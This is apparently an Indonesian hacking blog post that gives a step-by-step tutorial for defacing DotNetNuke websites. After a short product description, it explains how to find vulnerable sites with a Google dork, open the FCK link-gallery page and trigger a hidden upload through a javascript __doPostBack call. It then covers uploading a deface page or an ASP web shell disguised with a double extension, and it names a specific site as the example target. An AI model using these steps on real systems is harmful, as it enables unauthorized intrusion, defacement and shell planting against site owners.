Deface ala DotNetNuke exploit

Apa itu DotNetNuke ??? DotNetNuke merupakan salah satu framework web aplikasi yang open source dengan menggunakan bahasa VB.NET. Aplikasi dari CMS ini dapat diperluas melalui penggunaan dari modul dan skin sehingga aplikasi ini digunakan untuk membuat, menyebarkan, dan mengatur intranet, extranet dan website. Edisi DotNetNuke Professional termasuk penambahan keamanan, kestabilan, dan dukungan garansi dari produk maupun aplikasi, serta tersedia dalam harga yang lebih murah dibandingkan aplikasi lainnya.

Apa Saja Fitur dari DotNetNuke?

DotNetNuke telah dikembangkan dengan fitur seperti: DotNetNuke telah dikembangkan dengan fitur seperti:

* Mudah di instal - Anda dapat memiliki DotNetNuke dan menjalankannya dalam hitungan menit.
* DotNetNuke mendukung beberapa website dari instalansi satu aplikasi.
* DotNetNuke mempunyai fitur lokalisasi banyak bahasa yang memperbolehkan admin untuk secara mudah menerjemahkan bahasa di halaman mereka.
* DotNetNuke dirancang untuk mudah dicocokkan kedalam suatu lingkungan yang telah ada.
* DotNetNuke dikenal secara luas dan dihargai di dalam suatu komunitas open source.
* DotNetNuke cocok untuk admin, content editor, pengembang, dan perancang website.

Mengapa Anda Perlu Memilih DotNetNuke Hosting Indonesia? DotNetNuke meliputi sekitar seribu modul dasar pada pendistribusian DotNetNuke, dan modul ini dapat di download pada website DotNetNuke, termasuk sistem E-Commerce, galeri foto, blog, forum, wiki dan pilihan mailing list. Penambahan modul third party disediakan oleh komunitas open source dengan para pengembang DNN.
Apa yang Dibutuhkan DotNetNuke Hosting? Kebutuhan utama dari halaman DotNetNuke meliputi:

* Web server yang mampu menjalankan ASP.NET 2.0 atau lebih.
* Database, seperti MS SQL Server 2005 atau MS SQL Server 2008 yang cocok dengan Windows hosting sebuah rancangan control panel untuk penginstalan dengan sekali klik!

nah klo udah tau mari kita langsung operasi.

sebenarnya bugs ini termasuk bugs lama, tapi masih banyak yang guna'in web aplikasi ini.............
postingan ini buka yang pertama kali ane post. pertama kali ane post di Forum MEH kemudian digroup Facebook Blackbox Guardian Yang berganti Nama Jadi Red Alpha. Terus Di forum BCC nah yang ane disini kali keempat-nya. itung-itung buat nambah² archive Blog..hehehehehe

langsung saja

1. Sapkan file deface anda
contoh bisa di lihat di sini >> http://pariscapes.com/portals/0/cumi++.txt
lalu save di notepad dengan nama file terserah anda contoh namaanda.txt
atau siapkan shell asp lalu save .asp;.jpg atau .asp;.txt

2.mencari target web

dork >> inurl:”/portals/0″
search di google...!!

3. jalankan aksi
setelah kita search digoole dan menemukan target
contoh >> http://pariscapes.com/portals/0/cumi++.txt << Target sekarang ganti "portals/0/cumi++.txt" dengan >> Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

hingga seperti ini >> http://pariscapes.com/Pro...nkgallery.aspx
Enter..!!

lalu klik/ceklist Link Type: File ( A File On Your Site )

setelah di klik atto ceklis,hapus link di URL...!!
http://pariscapes.com/Pro...nkgallery.aspx
/\
||
||
hapus semua..!!
lalu masukan ini di URL >> javascript:__doPostBack('ctlURL$cmdUpload','')
>>>ENTER..!!

lalu silahkan Upload dari kompi/PC anda file yg td di save contoh cumi++.txt
klik >> Upload Selected File

Catatan: Anda hanya dapat meng-upload type file:*. swf, *. jpg, *. jpeg, *. JPE, *. gif, *. bmp, *. png, *. doc, *. xls, *. ppt, *. pdf, *. txt, *. xml, *. xsl, *. css, *. zip, *. 3gp, *. asf, *. asx, *. avi, *. flv, *. m4v, *. mov, *. mp4, *. mpe, *. mpeg, *. mpg, *. ram, *. rm, *. rmvb, *. wm, *. wmv, *. vob
tetapi admin dapat mengubah ini

selesai upload nanti kelihatan di File Name contoh: cumi++.txt
untuk melihat hasilnya >> nama web/Portals/0/nama file

contoh >> http://pariscapes.com/portals/0/cumi++.txt

Selesai dech........
dari tutor diatas silahkan di explore kemampuan anda

Selamat mencoba 
Thanks to 70h4n 7m and Pekanbaru Cyber Team

Posted in: Hacking